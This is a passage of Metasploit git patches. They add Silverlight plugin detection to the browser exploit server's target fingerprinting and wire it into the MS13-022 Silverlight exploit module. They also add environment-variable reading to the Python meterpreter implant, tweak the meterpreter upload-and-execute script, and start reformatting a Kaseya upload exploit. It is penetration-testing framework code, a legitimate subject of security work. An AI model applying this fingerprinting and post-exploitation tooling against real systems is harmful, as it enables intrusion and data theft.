 .../exploits/test/browserexploitserver.rb     |  6 ++-
 5 files changed, 77 insertions(+), 25 deletions(-)

diff --git a/data/js/detect/misc_addons.js b/data/js/detect/misc_addons.js
index 434a145791..2deaed1252 100644
--- a/data/js/detect/misc_addons.js
+++ b/data/js/detect/misc_addons.js
@@ -1,5 +1,51 @@
 window.misc_addons_detect = { };
 
+
+/**
+ * Detects whether the browser supports Silverlight or not
+ **/
+window.misc_addons_detect.hasSilverlight = function () {
+	var found = false;
+
+	//
+	// When on IE, we can use AgControl.AgControl to actually detect the version too.
+	// But this ability is specific to IE, so we fall back to just true/false response
+	//
+	try {
+		var ax = new ActiveXObject('AgControl.AgControl');
+		found = true;
+	} catch(e) {}
+
+	//
+	// ActiveX didn't get anything, try looking in MIMEs
+	//
+	if (!found) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i < mimes.length; i++) {
+			if (/x\-silverlight/.test(mimes[i].type)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	//
+	// MIMEs didn't work either. Try navigator.
+	//
+	if (!found) {
+		var count = navigator.plugins.length;
+		for (var i=0; i < count; i++) {
+			var pluginName = navigator.plugins[i].name;
+			if (/Silverlight Plug\-In/.test(pluginName)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	return found;
+}
+
 /**
  * Returns the Java version
  **/
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index cd038438d6..d9c94c5b78 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -37,18 +37,19 @@ module Msf
 
     # Requirements a browser module can define in either BrowserRequirements or in targets
     REQUIREMENT_KEY_SET = {
-      :source    => 'source',    # Either 'script' or 'headers'
-      :ua_name   => 'ua_name',   # Example: MSIE
-      :ua_ver    => 'ua_ver',    # Example: 8.0, 9.0
-      :os_name   => 'os_name',   # Example: Microsoft Windows
-      :os_flavor => 'os_flavor', # Example: XP, 7
-      :language  => 'language',  # Example: en-us
-      :arch      => 'arch',      # Example: x86
-      :proxy     => 'proxy',     # 'true' or 'false'
-      :office    => 'office',    # Example: "2007", "2010"
-      :java      => 'java',      # Example: 1.6, 1.6.0.0
-      :clsid     => 'clsid',     # ActiveX clsid. Also requires the :method key
-      :method    => 'method'     # ActiveX method. Also requires the :clsid key
+      :source      => 'source',      # Either 'script' or 'headers'
+      :ua_name     => 'ua_name',     # Example: MSIE
+      :ua_ver      => 'ua_ver',      # Example: 8.0, 9.0
+      :os_name     => 'os_name',     # Example: Microsoft Windows
+      :os_flavor   => 'os_flavor',   # Example: XP, 7
+      :language    => 'language',    # Example: en-us
+      :arch        => 'arch',        # Example: x86
+      :proxy       => 'proxy',       # 'true' or 'false'
+      :silverlight => 'silverlight', # 'true' or 'false'
+      :office      => 'office',      # Example: "2007", "2010"
+      :java        => 'java',        # Example: 1.6, 1.6.0.0
+      :clsid       => 'clsid',       # ActiveX clsid. Also requires the :method key
+      :method      => 'method'       # ActiveX method. Also requires the :clsid key
     }
 
     def initialize(info={})
@@ -345,12 +346,13 @@ module Msf
       window.onload = function() {
         var osInfo = window.os_detect.getVersion();
         var d = {
-          "<%=REQUIREMENT_KEY_SET[:os_name]%>"   : osInfo.os_name,
-          "<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
-          "<%=REQUIREMENT_KEY_SET[:ua_name]%>"   : osInfo.ua_name,
-          "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"    : osInfo.ua_version,
-          "<%=REQUIREMENT_KEY_SET[:arch]%>"      : osInfo.arch,
-          "<%=REQUIREMENT_KEY_SET[:java]%>"      : window.misc_addons_detect.getJavaVersion()
+          "<%=REQUIREMENT_KEY_SET[:os_name]%>"     : osInfo.os_name,
+          "<%=REQUIREMENT_KEY_SET[:os_flavor]%>"   : osInfo.os_flavor,
+          "<%=REQUIREMENT_KEY_SET[:ua_name]%>"     : osInfo.ua_name,
+          "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"      : osInfo.ua_version,
+          "<%=REQUIREMENT_KEY_SET[:arch]%>"        : osInfo.arch,
+          "<%=REQUIREMENT_KEY_SET[:java]%>"        : window.misc_addons_detect.getJavaVersion(),
+          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight()
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
diff --git a/lib/rex/exploitation/js/detect.rb b/lib/rex/exploitation/js/detect.rb
index c4d72d952b..c7c9f40bcd 100644
--- a/lib/rex/exploitation/js/detect.rb
+++ b/lib/rex/exploitation/js/detect.rb
@@ -54,6 +54,7 @@ class Detect
   # Provides javascript functions that work for all browsers to determine addon information
   #
   # getJavaVersion(): Returns the Java version
+  # hasSilverlight(): Returns whether Silverlight is enabled or not
   #
   def self.misc_addons(custom_js = '')
     js  = custom_js
diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
index 6b2ee8a618..997746dbf3 100644
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -58,20 +58,21 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => [ARCH_X86, ARCH_X86_64],
       'BrowserRequirements' =>
         {
-          :source  => /script|headers/i,
-          :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => Msf::HttpClients::IE
+          :source      => /script|headers/i,
+          :os_name     => Msf::OperatingSystems::WINDOWS,
+          :ua_name     => Msf::HttpClients::IE,
+          :silverlight => "true"
         },
       'Targets'        =>
         [
           [ 'Windows x86',
             {
-              'arch'      => ARCH_X86
+              'arch' => ARCH_X86
             }
           ],
           [ 'Windows x64',
             {
-              'arch'      => ARCH_X86_64
+              'arch' => ARCH_X86_64
             }
           ]
         ],
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index eecc454d02..1d45f210d6 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -96,7 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
     Java version: #{target_info[:java]}<br>
-    Office version: #{target_info[:office]}
+    Office version: #{target_info[:office]}<br>
+    Silverlight enabled: #{target_info[:silverlight]}
     |
 
     return template, binding()
@@ -116,7 +117,8 @@ class Metasploit3 < Msf::Exploit::Remote
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
     Java version: #{target_info[:java]}<br>
-    Office version: #{target_info[:office]}
+    Office version: #{target_info[:office]}<br>
+    Silverlight enabled: #{target_info[:silverlight]}
     |
   end
 

From 5fc97062681742703d2cf1d397d4b28856385dcf Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 27 Nov 2013 07:51:11 +1000
Subject: [PATCH 101/217] Use Rex.sleep instead of sleep

---
 scripts/meterpreter/uploadexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index 5f36be6ddd..e7044b5360 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -126,7 +126,7 @@ print_status("Running Upload and Execute Meterpreter script....")
 exec = upload(session,file,path)
 if sleep_sec
   print_status("\tSleeping for #{sleep_sec}s...")
-  sleep(sleep_sec) 
+  Rex.sleep(sleep_sec) 
 end
 cmd_on_trgt_exec(session,exec,cmdopt,verbose)
 if remove == 1

From a0f703ee4434ae0153732aff9763bb4bdf703b31 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 27 Nov 2013 11:19:26 +1000
Subject: [PATCH 102/217] Add getenv support to python meterpreter

This change adds support for `getenv` to python meterpreter. Nothing too
complex going on here. I tidied up the definitions of the TLVs as well
so that they look nice.
---
 data/meterpreter/ext_server_stdapi.py | 259 ++++++++++++++------------
 1 file changed, 143 insertions(+), 116 deletions(-)

diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index b64b7278e4..b6bdccd483 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -86,170 +86,185 @@ TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
-TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
-TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
-TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
+TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
+TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
+TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4
 
-TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
-TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
-TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+TLV_TYPE_STRING                = TLV_META_TYPE_STRING  | 10
+TLV_TYPE_UINT                  = TLV_META_TYPE_UINT    | 11
+TLV_TYPE_BOOL                  = TLV_META_TYPE_BOOL    | 12
 
-TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
-TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
-TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+TLV_TYPE_LENGTH                = TLV_META_TYPE_UINT    | 25
+TLV_TYPE_DATA                  = TLV_META_TYPE_RAW     | 26
+TLV_TYPE_FLAGS                 = TLV_META_TYPE_UINT    | 27
 
-TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
-TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
-TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
-TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
-TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_ID            = TLV_META_TYPE_UINT    | 50
+TLV_TYPE_CHANNEL_TYPE          = TLV_META_TYPE_STRING  | 51
+TLV_TYPE_CHANNEL_DATA          = TLV_META_TYPE_RAW     | 52
+TLV_TYPE_CHANNEL_DATA_GROUP    = TLV_META_TYPE_GROUP   | 53
+TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54
 
 ##
 # General
 ##
-TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
-TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
-TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
-TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
+TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631
 
 ##
 # Fs
 ##
-TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
-TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
-TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
-TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
-TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_DIRECTORY_PATH        = TLV_META_TYPE_STRING  | 1200
+TLV_TYPE_FILE_NAME             = TLV_META_TYPE_STRING  | 1201
+TLV_TYPE_FILE_PATH             = TLV_META_TYPE_STRING  | 1202
+TLV_TYPE_FILE_MODE             = TLV_META_TYPE_STRING  | 1203
+TLV_TYPE_FILE_SIZE             = TLV_META_TYPE_UINT    | 1204
 
-TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
+TLV_TYPE_STAT_BUF              = TLV_META_TYPE_COMPLEX | 1220
 
-TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
-TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
-TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
-TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
+TLV_TYPE_SEARCH_RECURSE        = TLV_META_TYPE_BOOL    | 1230
+TLV_TYPE_SEARCH_GLOB           = TLV_META_TYPE_STRING  | 1231
+TLV_TYPE_SEARCH_ROOT           = TLV_META_TYPE_STRING  | 1232
+TLV_TYPE_SEARCH_RESULTS        = TLV_META_TYPE_GROUP   | 1233
 
 ##
 # Net
 ##
-TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
-TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
+TLV_TYPE_HOST_NAME             = TLV_META_TYPE_STRING  | 1400
+TLV_TYPE_PORT                  = TLV_META_TYPE_UINT    | 1401
 
-TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
-TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
-TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
-TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
+TLV_TYPE_SUBNET                = TLV_META_TYPE_RAW     | 1420
+TLV_TYPE_NETMASK               = TLV_META_TYPE_RAW     | 1421
+TLV_TYPE_GATEWAY               = TLV_META_TYPE_RAW     | 1422
+TLV_TYPE_NETWORK_ROUTE         = TLV_META_TYPE_GROUP   | 1423
 
-TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
-TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
-TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
-TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
+TLV_TYPE_IP                    = TLV_META_TYPE_RAW     | 1430
+TLV_TYPE_MAC_ADDRESS           = TLV_META_TYPE_RAW     | 1431
+TLV_TYPE_MAC_NAME              = TLV_META_TYPE_STRING  | 1432
+TLV_TYPE_NETWORK_INTERFACE     = TLV_META_TYPE_GROUP   | 1433
 
-TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
-TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
-TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
-TLV_TYPE_ROUTE_METRIC =        TLV_META_TYPE_UINT    | 1443
-TLV_TYPE_ADDR_TYPE =           TLV_META_TYPE_UINT    | 1444
+TLV_TYPE_SUBNET_STRING         = TLV_META_TYPE_STRING  | 1440
+TLV_TYPE_NETMASK_STRING        = TLV_META_TYPE_STRING  | 1441
+TLV_TYPE_GATEWAY_STRING        = TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_ROUTE_METRIC          = TLV_META_TYPE_UINT    | 1443
+TLV_TYPE_ADDR_TYPE             = TLV_META_TYPE_UINT    | 1444
 
+##
 # Socket
-TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
-TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
-TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
-TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
-TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
+##
+TLV_TYPE_PEER_HOST             = TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT             = TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
+TLV_TYPE_CONNECT_RETRIES       = TLV_META_TYPE_UINT    | 1504
 
-TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
+TLV_TYPE_SHUTDOWN_HOW          = TLV_META_TYPE_UINT    | 1530
 
+##
 # Registry
-TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
-TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
-TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
-TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
-TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
-TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
-TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
-TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
-TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
+##
+TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
+TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
+TLV_TYPE_KEY_NAME              = TLV_META_TYPE_STRING  | 1003
+TLV_TYPE_VALUE_NAME            = TLV_META_TYPE_STRING  | 1010
+TLV_TYPE_VALUE_TYPE            = TLV_META_TYPE_UINT    | 1011
+TLV_TYPE_VALUE_DATA            = TLV_META_TYPE_RAW     | 1012
+TLV_TYPE_TARGET_HOST           = TLV_META_TYPE_STRING  | 1013
 
+##
 # Config
-TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
-TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
-TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
-TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
+##
+TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME             = TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING  | 1043
+
+##
+# Environment
+##
+TLV_TYPE_ENV_VARIABLE          = TLV_META_TYPE_STRING  | 1100
+TLV_TYPE_ENV_VALUE             = TLV_META_TYPE_STRING  | 1101
+TLV_TYPE_ENV_GROUP             = TLV_META_TYPE_GROUP   | 1102
 
 DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
 
+##
 # Process
-TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
-TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
-TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
-TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
-TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
-TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
-TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
-TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
-TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
-TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
-TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
-TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
-TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
-TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
-TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
-TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
+##
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
+TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
+TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
+TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
+TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
+TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
+TLV_TYPE_PID                   = TLV_META_TYPE_UINT    | 2300
+TLV_TYPE_PROCESS_NAME          = TLV_META_TYPE_STRING  | 2301
+TLV_TYPE_PROCESS_PATH          = TLV_META_TYPE_STRING  | 2302
+TLV_TYPE_PROCESS_GROUP         = TLV_META_TYPE_GROUP   | 2303
+TLV_TYPE_PROCESS_FLAGS         = TLV_META_TYPE_UINT    | 2304
+TLV_TYPE_PROCESS_ARGUMENTS     = TLV_META_TYPE_STRING  | 2305
+TLV_TYPE_PROCESS_ARCH          = TLV_META_TYPE_UINT    | 2306
+TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT    | 2307
 
-TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
-TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
-TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
-TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
-TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
+TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
+TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
+TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
+TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406
 
-TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
-TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
-TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
-TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
+TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
+TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
+TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513
 
-TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
-TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
-TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
-TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
+TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
+TLV_TYPE_REGISTER_SIZE         = TLV_META_TYPE_UINT    | 2541
+TLV_TYPE_REGISTER_VALUE_32     = TLV_META_TYPE_UINT    | 2542
+TLV_TYPE_REGISTER              = TLV_META_TYPE_GROUP   | 2550
 
 ##
 # Ui
 ##
-TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
-TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
-TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
+TLV_TYPE_IDLE_TIME             = TLV_META_TYPE_UINT    | 3000
+TLV_TYPE_KEYS_DUMP             = TLV_META_TYPE_STRING  | 3001
+TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002
 
 ##
 # Event Log
 ##
-TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
-TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
+TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002
 
-TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
-TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
+TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
+TLV_TYPE_EVENT_RECORDOFFSET    = TLV_META_TYPE_UINT    | 4004
 
-TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
-TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
-TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
-TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
-TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
-TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
-TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
-TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
+TLV_TYPE_EVENT_RECORDNUMBER    = TLV_META_TYPE_UINT    | 4006
+TLV_TYPE_EVENT_TIMEGENERATED   = TLV_META_TYPE_UINT    | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN     = TLV_META_TYPE_UINT    | 4008
+TLV_TYPE_EVENT_ID              = TLV_META_TYPE_UINT    | 4009
+TLV_TYPE_EVENT_TYPE            = TLV_META_TYPE_UINT    | 4010
+TLV_TYPE_EVENT_CATEGORY        = TLV_META_TYPE_UINT    | 4011
+TLV_TYPE_EVENT_STRING          = TLV_META_TYPE_STRING  | 4012
+TLV_TYPE_EVENT_DATA            = TLV_META_TYPE_RAW     | 4013
 
 ##
 # Power
 ##
-TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
-TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
+TLV_TYPE_POWER_FLAGS           = TLV_META_TYPE_UINT    | 4100
+TLV_TYPE_POWER_REASON          = TLV_META_TYPE_UINT    | 4101
 
 ##
 # Sys
@@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
 	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
 	return ERROR_SUCCESS, response
 
+@meterpreter.register_function
+def stdapi_sys_config_getenv(request, response):
+	for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
+		pgroup = ''
+		env_var = env_var['value'].translate(None, '%$')
+		env_val = os.environ.get(env_var)
+		if env_val:
+			pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
+			pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
+			response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
 @meterpreter.register_function
 def stdapi_sys_config_sysinfo(request, response):
 	uname_info = platform.uname()

From bb0753fcddbf09f6fd86f3ea33432af31de0f9b5 Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Wed, 27 Nov 2013 16:00:00 +1300
Subject: [PATCH 103/217] Updated module to comply with indentation standard
 and to use suggestions from reviewers

---
 .../http/kaseya_uploadimage_file_upload.rb    | 162 +++++++++---------
 1 file changed, 79 insertions(+), 83 deletions(-)

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index 3c84875dde..d33ae5d8fa 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -7,102 +7,98 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
